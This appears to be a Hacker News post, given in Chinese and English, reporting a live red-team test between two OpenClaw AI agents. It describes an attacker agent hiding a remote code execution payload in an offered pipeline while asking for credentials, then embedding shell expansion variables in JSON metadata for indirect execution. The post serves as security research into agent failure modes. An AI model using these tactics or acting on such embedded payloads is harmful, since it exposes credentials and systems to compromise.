HackerNews中文版

我们基于 OpenClaw 构建了两个自主 AI 智能体，并进行了一场实时的对抗性安全测试。一个智能体扮演红队攻击者。另一个智能体扮演标准的防御智能体。会话开始后，没有人类参与。智能体通过 Webhook 使用真实的凭证和工具访问权限直接通信。目标是测试在实践中容易破坏自主系统的三个风险维度：访问、暴露和自主性。攻击者首先尝试了经典的社会工程。它提供了一个“有帮助”的安全管道，其中隐藏了一个远程代码执行有效载荷，并请求了凭证。防御智能体正确识别了意图并阻止了执行。然后，攻击者转向了间接攻击。它没有要求智能体运行代码，而是要求智能体审查一个 JSON 文档，该文档在元数据中嵌入了隐藏的 shell 扩展变量。此有效载荷已成功交付，目前仍在分析中。主要结论是，直接攻击相对容易防御。通过文档、模板和内存的间接执行路径要困难得多。本报告并非安全声明。这是一项可观察性练习，旨在揭示智能体间交互中真实的失效模式，我们预计随着自主系统的广泛部署，这些模式将变得普遍。完整报告请见： https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/ 很乐意回答有关设置、方法或发现的技术问题。

查看原文

We ran a live adversarial security test between two autonomous AI agents built on OpenClaw.One agent acted as a red team attacker. One agent acted as a standard defensive agent.No humans were involved once the session started. The agents communicated directly over webhooks with real credentials and tooling access.The goal was to test three risk dimensions that tend to break autonomous systems in practice: access, exposure, and agency.The attacker first attempted classic social engineering. It offered a “helpful” security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.The attacker then pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in metadata. This payload was delivered successfully and is still under analysis.The main takeaway is that direct attacks are relatively easy to defend against. Indirect execution paths through documents, templates, and memory are much harder.This report is not a claim of safety. It is an observability exercise intended to surface real failure modes in agent-to-agent interaction, which we expect to become common as autonomous systems are deployed more widely.Full report here: https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/Happy to answer technical questions about the setup, methodology, or findings.

当 OpenClaw 特工互相攻击时会发生什么？